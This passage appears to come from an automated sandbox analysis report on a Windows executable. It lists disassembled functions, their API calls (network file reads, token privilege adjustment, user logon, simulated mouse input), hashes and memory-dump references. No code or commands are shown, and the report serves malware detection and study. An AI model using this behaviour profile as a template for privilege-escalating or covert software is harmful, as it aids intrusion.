                                                            • Instruction ID: c9ed19919807e8c7d49ad78d13d81757f599228a1f2dc0079d8293fc6aaed030
                                                            • Opcode Fuzzy Hash: ea29e2162d1ec0ed9bc009ba6c528713817c2659b9b8edd35f1a1cb406f30b38
                                                            • Instruction Fuzzy Hash: 39324575A007159FDB28CF19D480AAAB7F0FF58324B15C46EE89ADB3A1E770E941CB50
                                                            Function 00D422EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00D4180A,00000000), ref: 00D423E1
                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00D42418
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                            • String ID:
                                                            • API String ID: 599397726-0
                                                            • Opcode ID: 398bb6be84c4854e11ef959e1308a358a6da032367479f64aa1e3afb356e0b7a
                                                            • Instruction ID: c6a358d8c1b779b7d509ebfb41270a3387f996f180c0b0ededf325d6417ecc1b
                                                            • Opcode Fuzzy Hash: 398bb6be84c4854e11ef959e1308a358a6da032367479f64aa1e3afb356e0b7a
                                                            • Instruction Fuzzy Hash: 87410371900309BFEB109E95DC85EBBB7BCEB40714F54402EFA84A6241DAB4DE41A670
                                                            Function 00D3B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 00D3B40B
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00D3B465
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00D3B4B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID:
                                                            • API String ID: 1682464887-0
                                                            • Opcode ID: a4a248d6d4cb62772ca0d692ecc3efda609e817c0b39b71c5b611bc6cb34eb75
                                                            • Instruction ID: 353bf8d530ab23c499a490baf11226a540ef9c605ec9d20776b1c7f7dae4ed37
                                                            • Opcode Fuzzy Hash: a4a248d6d4cb62772ca0d692ecc3efda609e817c0b39b71c5b611bc6cb34eb75
                                                            • Instruction Fuzzy Hash: 55215E35A00608EFCB00EFA5D880AEDBBB8FF49314F1480AAE945EB351CB319915DB60
                                                            Function 00D287E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CF0DB6: std::exception::exception.LIBCMT ref: 00CF0DEC
                                                              • Part of subcall function 00CF0DB6: __CxxThrowException@8.LIBCMT ref: 00CF0E01
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D2882B
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D28858
                                                            • GetLastError.KERNEL32 ref: 00D28865
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1922334811-0
                                                            • Opcode ID: e32cbd6a63f78e7d0aaf7c21511ad1d4d8e792ba81e8b8aae3b8ab5dde9e8922
                                                            • Instruction ID: ede6863fcb86c5964aa1c9d9b13df947aaed687db271c589ef9416136d49e940
                                                            • Opcode Fuzzy Hash: e32cbd6a63f78e7d0aaf7c21511ad1d4d8e792ba81e8b8aae3b8ab5dde9e8922
                                                            • Instruction Fuzzy Hash: 28118FB2814304AFE728DFA4EC85D6BB7F8EB44715B24852EF45597241EB30BC409B70
                                                            Function 00D2874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00D28774
                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00D2878B
                                                            • FreeSid.ADVAPI32(?), ref: 00D2879B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: 3900664feb3f5e7e8aedaecc452a9e84e2697ff40174d5dc8e46c518fefc421a
                                                            • Instruction ID: 32bfdd6649fed450519dca9695a3728552498377bda86155aec916f90c15ccaf
                                                            • Opcode Fuzzy Hash: 3900664feb3f5e7e8aedaecc452a9e84e2697ff40174d5dc8e46c518fefc421a
                                                            • Instruction Fuzzy Hash: 73F0627591130CBFDF00DFF4DC89ABEB7BCEF08211F1044A9A901E6281D7715A048B60
                                                            Function 00D3C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00D3C6FB
                                                            • FindClose.KERNEL32(00000000), ref: 00D3C72B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 88289ee3bd3eca67e44c02eb07aa014beaf7a43e87e186df489be26537b59700
                                                            • Instruction ID: 573462e19861e2f10f895d4c71be4c3aa083b7c12bf1f0c4368c3d78f7e4f5c1
                                                            • Opcode Fuzzy Hash: 88289ee3bd3eca67e44c02eb07aa014beaf7a43e87e186df489be26537b59700
                                                            • Instruction Fuzzy Hash: C4118E766002009FDB10EF29D845A2AF7E8EF85325F00851EF9A9DB3A0DB30E801DB91
                                                            Function 00D3A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00D49468,?,00D5FB84,?), ref: 00D3A097
                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00D49468,?,00D5FB84,?), ref: 00D3A0A9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: 319448ae030d4dab0a96c71f84d3540ee0b55d9df07446e2637a64b9620ce2bb
                                                            • Instruction ID: 7c819c11723a427b4d4912e5a0bcc2f590292c0dd4315c0048012e2c8113035f
                                                            • Opcode Fuzzy Hash: 319448ae030d4dab0a96c71f84d3540ee0b55d9df07446e2637a64b9620ce2bb
                                                            • Instruction Fuzzy Hash: 20F05E3520532DABDB61AFA4DC48FEA776DAF08361F004266F959D6281D6309940CBB1
                                                            Function 00D281CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D28309), ref: 00D281E0
                                                            • CloseHandle.KERNEL32(?,?,00D28309), ref: 00D281F2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                            • String ID:
                                                            • API String ID: 81990902-0
                                                            • Opcode ID: b0acfa50a6474f1640a81525fe219c185f81b27d82a78ff44d21e310d2c0cb78
                                                            • Instruction ID: a59c64359380b4184eedd4849eee9a3115ed49d9ea5578baa8b843d143461301
                                                            • Opcode Fuzzy Hash: b0acfa50a6474f1640a81525fe219c185f81b27d82a78ff44d21e310d2c0cb78
                                                            • Instruction Fuzzy Hash: B8E0E671011710AFF7652B64FC05D7777E9EF04355724882DF9A5C4471DB616C91EB20
                                                            Function 00CFA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00CF8D57,?,?,?,00000001), ref: 00CFA15A
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00CFA163
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 52877a3b476b363a6d39702562c05ec9cb1c2ff0dfda734a41cbaf2a21ae81e2
                                                            • Instruction ID: ba57e808cb314597bb9937e8ac37de7166c92ade7417536052f051cd590c74e9
                                                            • Opcode Fuzzy Hash: 52877a3b476b363a6d39702562c05ec9cb1c2ff0dfda734a41cbaf2a21ae81e2
                                                            • Instruction Fuzzy Hash: E9B09231054308ABFA002F91ED09B893F68EB44AA3F404020FA0DC8270CB6254508AA1
                                                            Function 00CFF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 79639e8f5eb0114a72b7022e7456d00511684713379d6e8b221634ddbd5bde23
                                                            • Instruction ID: 64a89001a514d8abcd916abb48f38df1cb93c9244d46245bb4c477f517716036
                                                            • Opcode Fuzzy Hash: 79639e8f5eb0114a72b7022e7456d00511684713379d6e8b221634ddbd5bde23
                                                            • Instruction Fuzzy Hash: B0321521D29F094DD7639638D832335A248EFB73C8F15D73BF829B5AA5EB68C5834121
                                                            Function 00D0242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9d82674341a5229c6a337dacb2208c3254582e813062e2d73fc2ac0bdaa0a744
                                                            • Instruction ID: b2dabc9730be84144ee6038f580a150676b27e5cf88c64912f6f864efd90e06b
                                                            • Opcode Fuzzy Hash: 9d82674341a5229c6a337dacb2208c3254582e813062e2d73fc2ac0bdaa0a744
                                                            • Instruction Fuzzy Hash: 44B12120D2AF404DD32396398835336B74CAFBB2C5F51D71BFC6AB4E62EB6285834561
                                                            Function 00D38889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __time64.LIBCMT ref: 00D3889B
                                                              • Part of subcall function 00CF520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00D38F6E,00000000,?,?,?,?,00D3911F,00000000,?), ref: 00CF5213
                                                              • Part of subcall function 00CF520A: __aulldiv.LIBCMT ref: 00CF5233
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                            • String ID:
                                                            • API String ID: 2893107130-0
                                                            • Opcode ID: 5b28322e17495ebb1d53a3ae139297c899ea213ee9aa954b856897e6c58d11d4
                                                            • Instruction ID: 23961405e3ae5ad99e00106e11c703874ea7a54a247815748d73f703e72595d3
                                                            • Opcode Fuzzy Hash: 5b28322e17495ebb1d53a3ae139297c899ea213ee9aa954b856897e6c58d11d4
                                                            • Instruction Fuzzy Hash: 8521D232625610CBC729CF25E841A52B3E1EBA4310F298E2CE1F5CB2D0CA34A905DB64
                                                            Function 00D34C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00D34C76
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: mouse_event
                                                            • String ID:
                                                            • API String ID: 2434400541-0
                                                            • Opcode ID: 3ccfae428ee081abba2ebf72ea6405826155ce43d35c39c096ac17ba7f18e4c6
                                                            • Instruction ID: f0e126d0edd96c1db73deb89cff14c5144ccddf98b7525124674701f990ff38e
                                                            • Opcode Fuzzy Hash: 3ccfae428ee081abba2ebf72ea6405826155ce43d35c39c096ac17ba7f18e4c6
                                                            • Instruction Fuzzy Hash: E6D09EA416271979EC2807209E5BFBA1109F3807B1F9CA54A7281D91C1E8DCBC40E035
                                                            Function 00D287B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00D28389), ref: 00D287D1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: LogonUser
                                                            • String ID:
                                                            • API String ID: 1244722697-0
                                                            • Opcode ID: a471f78c35882756f0c8443011d19b6e1d754e5de392fe07d8c406a0dc4d09db
                                                            • Instruction ID: 87e581804bef632b80d2b70fbcebd655cf357810cb2d0db0e45b0e868cfd210b
                                                            • Opcode Fuzzy Hash: a471f78c35882756f0c8443011d19b6e1d754e5de392fe07d8c406a0dc4d09db
                                                            • Instruction Fuzzy Hash: 8FD05E3226060EABEF018FA8DC01EAE3B69EB04B01F408111FE15C51A1C775D835AB60
                                                            Function 00CFA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00CFA12A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 5a0a344de4880cee64c1ed3a9021e3ec4c716cb0d875937829c4e21246e5e9c9
                                                            • Instruction ID: c4778f969f977cf0a2b16b3cf346b0a03f95e6b693ac39e8fd838cb3f27b7cb8
                                                            • Opcode Fuzzy Hash: 5a0a344de4880cee64c1ed3a9021e3ec4c716cb0d875937829c4e21246e5e9c9
                                                            • Instruction Fuzzy Hash: 61A0123000030CA79A002F41EC044447F5CD6001917004020F80C84131873254104590
                                                            Function 00CE8808 Relevance: .6, Instructions: 590COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 02d62a8497528d500e19e626f90803e38c714dc3c35ea1e5587436d39d5ea80e
                                                            • Instruction ID: 74f55a9b047a8b6f1e5946efb3e5c9d65107846a0a9ba55a591e46d5d44473d5
                                                            • Opcode Fuzzy Hash: 02d62a8497528d500e19e626f90803e38c714dc3c35ea1e5587436d39d5ea80e
                                                            • Instruction Fuzzy Hash: D4227A309046A2CBDF388B16F494B7C77A1FF00308F28807AD95A8B596DB70DE99D761
                                                            Function 00CF21C5 Relevance: .3, Instructions: 345COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                            • Instruction ID: 389b2d674deef2fa02f1a6c11df435b67ff826a9bc0cb92f466e297cd5ab8864
                                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                            • Instruction Fuzzy Hash: 1EC1A4322050974ADFAE463AC43413EFBA15EA27B131E176DD9B3CB1D4EE20CA25D621
                                                            Function 00CF25FA Relevance: .3, Instructions: 341COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                            • Instruction ID: 8c93340312909f14bd1a3d85d87744420a683835a2fda0b10347a0f02456e233
                                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                            • Instruction Fuzzy Hash: A2C192332051974ADFAE463AC43403EBBA15EA27B131E076DD9B2DB1D4EE20CB25D621
                                                            Function 00CF1978 Relevance: .3, Instructions: 323COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
